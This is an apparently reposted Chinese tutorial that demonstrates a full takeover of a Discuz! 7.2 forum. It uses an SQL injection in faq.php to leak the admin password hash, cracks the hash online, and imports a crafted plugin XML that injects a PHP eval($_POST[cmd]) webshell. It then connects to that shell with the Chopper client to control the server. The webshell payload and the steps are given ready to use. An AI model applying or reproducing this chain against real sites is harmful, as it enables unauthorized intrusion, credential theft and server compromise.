Discuz!7.2漏洞利用过程演示

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Discuz!7.2漏洞利用过程演示相关的知识,希望对你有一定的参考价值。

Discuz!7.2版本,这个版本是09年的平台了,现在已经是X版本了,不过里面的一些知识倒是到现在也还适用。

简述:利用Discuz!7.2的SQL注入漏洞爆出管理员用户密码后再利用xml检测漏洞上传一句话木马+菜刀getshell获得服务器控制权

实现过程:

首先,找到Discuz!版本为7.2的网站。

 技术分享

打开K8飞刀工具并选择Exploit下的Discuz!7.2项

 技术分享

选择faq.php 爆出管理员邮箱和加密后的管理员密码

再cmd5网站对加密数据串解密获得管理员明文密码登录Discuz!论坛

 技术分享

进入管理中心

技术分享

 

密码与管理员密码相同

在本机构建一句话木马插件

文件命名为dz7.2.xml

 技术分享

使用代码:

<?xml version="1.0" encoding="ISO-8859-1"?>

<root>

        <item id="Title"><![CDATA[Discuz! Plugin]]></item>

        <item id="Version"><![CDATA[7.2]]></item>

        <item id="Time"><![CDATA[2011-03-16 15:57]]></item>

        <item id="From"><![CDATA[Discuz! Board (http://www.antian365.com/) 

]]></item>

        <item id="Data">

                <item id="plugin">

                        <item id="available"><![CDATA[0]]></item>

                        <item id="adminid"><![CDATA[0]]></item>

                        <item id="name"><![CDATA[wwwsite]]></item>

                        <item id="identifier"><![CDATA[shell]]></item>

                        <item id="description"><![CDATA[]]></item>

                        <item id="datatables"><![CDATA[]]></item>

                        <item id="directory"><![CDATA[]]></item>

                        <item id="copyright"><![CDATA[]]></item>

                        <item id="modules"><![CDATA[a:0:{}]]></item>

                        <item id="version"><![CDATA[]]></item>

                </item>

                <item id="version"><![CDATA[7.2]]></item>

                <item id="language">

                        <item id="scriptlang">

                                <item id="a\\"><![CDATA[=>1); 

eval($_POST[cmd])?>]]></item>

                        </item>

                </item>

        </item>

</root>

进入后选择插件,选择木马文件,并勾选允许导入不同版本 Discuz! 的插件(易产生错误!!)复选框

 技术分享

点击提交后进入插件列表

 技术分享

勾选新出现的插件点击提交,如果不提交将无法getshell

点击勾选后,打开菜刀

 技术分享

编辑SHELL中

地址为:http://10.5.98.132/forumdata/plugins/shell.lang.php

后面的文本框内容为:cmd

配置为:

<T>mysql</T>

<H>10.5.98.132</H>

<U></U>

<P></P>

点击编辑完成

双击添加的shell条目

进入服务器

 技术分享

演示完毕!

 

以上是关于Discuz!7.2漏洞利用过程演示的主要内容,如果未能解决你的问题,请参考以下文章

如何为开发人员演示DOM型XSS漏洞利用过程

Discuz 7.2 faq.php漏洞分析

Discuz≤3.4任意文件删除漏洞

2022-10-08(Discuz漏洞FCKeditor文本编辑器漏洞ZooKeeper 未授权访问Memcahe 未授权访问)

discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造***利用与修复

漏洞复现Discuz-x3.1 插件漏洞